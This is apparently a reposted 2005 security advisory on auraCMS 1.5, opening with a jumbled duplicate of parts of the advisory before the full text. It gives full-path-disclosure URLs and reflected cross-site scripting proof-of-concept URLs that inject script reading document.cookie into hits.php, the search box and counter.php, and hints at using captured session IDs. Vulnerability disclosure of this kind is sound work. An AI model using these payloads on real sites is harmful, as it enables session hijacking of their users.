version: 1.5
date : 21 September 2004
lisensi: GPL - http://www.gnu.org/licenses/licenses.html#GPL
Author: Arif Supriyanto - arif (at) ayo.kliksini (dot) com [email concealed]
http://www.semarang.tk
http://www.ayo.kliksini.com
http://www.auracms.opensource-indonesia.com
Description:
auraCMS is a PHP script package that you to possiblity to building
a website with dynamic content easier and faster, no waste time more.
Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in
/home/cxxo/public_html/aura/teman.php on line 9
==>> http://[site]/[aura]/?pilih=hal&id=4%60tes
Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in
/home/cxxo/public_html/aura/hal.php on line 10
==>> http://[site]/[aura]/?pilih=arsip&topik=1%60
Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in
/home/cxxo/public_html/aura/arsip.php on line 11
B. Session ID
CMS with This version has two method of authentication (session and cookies) ,
this problem has found in session method .
There are so many variable that havent declared yet, it makes attacker could
exploit it by inputing some "character" n gaining an session id on windows pop up
for eXample
---- hits.php -----
<?
$perintah = "SELECT * FROM counter WHERE id=1";
$hasil = mysql_query( $perintah );
while ($data = mysql_fetch_row($hasil)) {
$hits=$data[3];
}
echo "<b>$hits</b>";
?>
-------end -------
look $hits variable , do you see something interested ? yes SIR , we've found something
lets do some try
founded : Januari 25th 2005
reported to vendor :Februari 15th 2005
;vendor respond but not yet releasing any patch
publish at securityfocus : March 2th 2005
------------------------------------------------------------------------
---
Vulnerabilities in Aura CMS
------------------------------------------------------------------------
---
Author: y3dips
Date: Januari, 25th 2005
Location: Indonesia, Jakarta
Web: http://echo.or.id/adv/adv011-y3dips-2005.txt
------------------------------------------------------------------------
---
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
auraCMS (Content Management System)
version: 1.5
date : 21 September 2004
lisensi: GPL - http://www.gnu.org/licenses/licenses.html#GPL
Author: Arif Supriyanto - arif (at) ayo.kliksini (dot) com [email concealed]
http://www.semarang.tk
http://www.ayo.kliksini.com
http://www.auracms.opensource-indonesia.com
Description:
auraCMS is a PHP script package that you to possiblity to building
a website with dynamic content easier and faster, no waste time more.
------------------------------------------------------------------------
---
Vulnerabilities:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
A. Full Path disclosures
==>> http://[site]/[aura]/?pilih=teman&id=34%60select%20all
Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in
/home/cxxo/public_html/aura/teman.php on line 9
==>> http://[site]/[aura]/?pilih=hal&id=4%60tes
Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in
/home/cxxo/public_html/aura/hal.php on line 10
==>> http://[site]/[aura]/?pilih=arsip&topik=1%60
Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in
/home/cxxo/public_html/aura/arsip.php on line 11
B. Session ID
CMS with This version has two method of authentication (session and cookies) ,
this problem has found in session method .
There are so many variable that havent declared yet, it makes attacker could
exploit it by inputing some "character" n gaining an session id on windows pop up
for eXample
---- hits.php -----
<?
$perintah = "SELECT * FROM counter WHERE id=1";
$hasil = mysql_query( $perintah );
while ($data = mysql_fetch_row($hasil)) {
$hits=$data[3];
}
echo "<b>$hits</b>";
?>
-------end -------
look $hits variable , do you see something interested ? yes SIR , we've found something
lets do some try
==>> http://[site]/[aura]/hits.php?&hits=%3Cscript%3Ealert(document.cookie)%3
C/script%3E
then you get the session ID
another vulnerable :
in pencarian (search) input box
+ http://[site]/[aura]/index.php?query=%3Cscript%3Ealert(document.cookie)%
3C/script%3E&pilih=search
also in counter module
+ http://[site]/[aura]/counter.php?theCount=%3Cscript%3Ealert(document.coo
kie)%3C/script%3E
p.s : Wanna know what session IDs gives you ? try google :D
------------------------------------------------------------------------
---
FIx :
founded : Januari 25th 2005
reported to vendor :Februari 15th 2005
;vendor respond but not yet releasing any patch
publish at securityfocus : March 2th 2005
------------------------------------------------------------------------
---
Shoutz:
~~~~~~~
~ m0by, the_day, comex, z3r0byt3, K-159, c-a-s-e, S`to, lirva32, anonymous
~ newbie_hacker (at) yahoogroups (dot) com [email concealed] ,http://forum.ehco.or.id
~ #e-c-h-o@DALNET
------------------------------------------------------------------------
---
Contact:
~~~~~~~~
y3dips || echo|staff || y3dips[at]gmail[dot]com
Homepage: http://y3dips.echo.or.id/
-------------------------------- [ EOF ] ----------------------------------
[ reply ]